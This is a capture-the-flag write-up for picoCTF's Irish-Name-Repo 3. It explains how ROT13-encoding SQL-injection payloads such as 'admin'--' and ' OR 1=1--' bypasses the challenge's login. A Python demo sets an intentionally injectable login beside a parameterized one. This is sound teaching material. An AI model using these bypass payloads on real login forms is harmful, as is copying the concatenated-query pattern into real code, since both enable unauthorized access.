Irish-Name-Repo 3 picoCTF 2019 Solution

Published: April 2, 2026

Description

Even more SQL injection. This version has an extra twist - ROT13 encoding is applied to your input before the query runs.

This is the third and hardest challenge in the Irish-Name-Repo series. Work through Irish-Name-Repo 1 and Irish-Name-Repo 2 first. The SQL Injection for CTF guide covers authentication bypass, including challenges where the input is encoded before injection.
  1. Step 1: Discover the ROT13 encoding
    Try a standard SQL injection payload and observe that it fails. Check the page source or look for hints that the input is being transformed before use. The server applies ROT13 to your input before inserting it into the SQL query.

    ROT13 is a Caesar cipher that rotates each letter by 13 positions. Applying it twice returns the original text. It affects only letters - digits, spaces, and punctuation (including SQL special characters like ' and -) pass through unchanged.

    This means that only the letters in a SQL injection payload need to be ROT13-encoded before submission; the apostrophe, dashes, spaces, and digits still work as-is.

  2. Step 2: ROT13-encode your SQL injection payload
    The payload admin'-- becomes nqzva'-- after ROT13. The apostrophe and dashes are unchanged, but 'admin' becomes 'nqzva'. Submit this as the username.
    python
    python3 -c "import codecs; print(codecs.encode('admin\'--', 'rot_13'))"

    When you submit the encoded payload, the server applies ROT13 again (the transform is its own inverse), recovering admin'--, and concatenates that into the SQL query. The result is the same SQL injection that worked in part 2: the closing quote terminates the username string and the -- comments out the rest of the WHERE clause, including the password check.

    Alternatively, ROT13 of ' OR 1=1-- is ' BE 1=1--. The letters OR become BE, but the SQL syntax characters (apostrophe, spaces, digits, dashes) are unchanged.

  3. Step 3: Submit the encoded payload and get the flag
    Enter the ROT13-encoded payload as the username. The server ROT13s it back to a valid SQLi payload, executes the broken query, and returns the flag.

    This challenge demonstrates that transforming input (here, ROT13) is not a security control. An attacker who knows the transform simply applies its inverse to the payload beforehand and lets the server undo the rest; the injection arrives intact. Real protection comes from parameterized queries, which keep user data separate from the query structure no matter what transformations are applied to the input first.
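    The three steps above, carried through end to end as an added example (this is not the challenge's server code; the users table, its columns, the query shape, and the placeholder flag are all assumed here). It models the vulnerable server as a ROT13 step followed by string concatenation into a SQLite query, shows that the unencoded payload fails while the ROT13-encoded payloads succeed, and then runs the same payloads against a version that binds the decoded value as a parameter:

```python
import codecs
import sqlite3

# Constructed stand-in for the real flag; the challenge's flag is not reproduced here.
FLAG = "flag{local-demo-only}"


def rot13(text: str) -> str:
    """ROT13 rotates letters only; digits, spaces, quotes and dashes pass through unchanged."""
    return codecs.encode(text, "rot_13")


def make_db() -> sqlite3.Connection:
    """In-memory users table standing in for the challenge's database (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, flag TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse', ?)", (FLAG,))
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Models the challenge server: ROT13 the username, then paste it into the query string.

    Returns the flag column when a row matches, None otherwise.
    """
    decoded = rot13(username)
    # The decoded value is spliced straight into the SQL text, so a quote in it
    # terminates the string literal and -- comments out the password check.
    query = (
        "SELECT flag FROM users "
        f"WHERE username='{decoded}' AND password='{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def hardened_login(conn: sqlite3.Connection, username: str, password: str):
    """Same ROT13 step, but the decoded value is bound as a parameter, never spliced into SQL."""
    decoded = rot13(username)
    row = conn.execute(
        "SELECT flag FROM users WHERE username=? AND password=?",
        (decoded, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # Unencoded payload (fails), then the two ROT13-encoded payloads from the writeup.
    for payload in ["admin'--", rot13("admin'--"), rot13("' OR 1=1--")]:
        print(
            f"{payload!r:>14} -> server sees {rot13(payload)!r:>14} "
            f"-> vulnerable: {vulnerable_login(conn, payload, 'x')!r}, "
            f"hardened: {hardened_login(conn, payload, 'x')!r}"
        )
```

    The hardened version still ROT13-decodes the username, which is the point: the transform is irrelevant to safety either way. With parameter binding, admin'-- is looked up as a literal username (no such user, no row) rather than being parsed as SQL.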

Flag

picoCTF{...}

ROT13-encode your SQL injection payload before submitting - the server ROT13-decodes it before placing it in the query.
